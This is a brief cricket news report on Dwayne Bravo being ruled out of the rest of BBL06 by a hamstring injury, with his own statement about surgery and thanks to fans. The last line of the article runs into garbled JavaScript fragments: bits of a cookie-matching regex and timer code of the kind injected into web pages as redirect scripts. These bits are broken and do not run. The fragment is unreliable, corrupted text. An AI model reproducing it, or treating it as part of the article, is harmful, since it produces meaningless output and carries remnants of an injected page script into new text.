Melbourne Renegades star Dwayne Bravo has been ruled out of the remainder of BBL06 due to a hamstring injury.

Bravo sustained the injury while fielding during the Renegades' thrilling final ball loss to the Perth Scorchers at Etihad Stadium on Thursday night.

The West Indian immediately reached for his hamstring after a desperate dive to cut off to a boundary and was taken from the field in obvious discomfort.

Bravo confirmed the extent of the injury on Friday afternoon.

“Unfortunately my Big Bash season is over which is very disappointing,” Bravo said.

“I’ll now have surgery and the rehabilitation to get me fit and playing at my best again. I want to thank all the Renegades fans for their support for me and I hope to see them again next season.”

The Renegades next match is against the Melbourne Stars at the MCG on New Year's Day. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
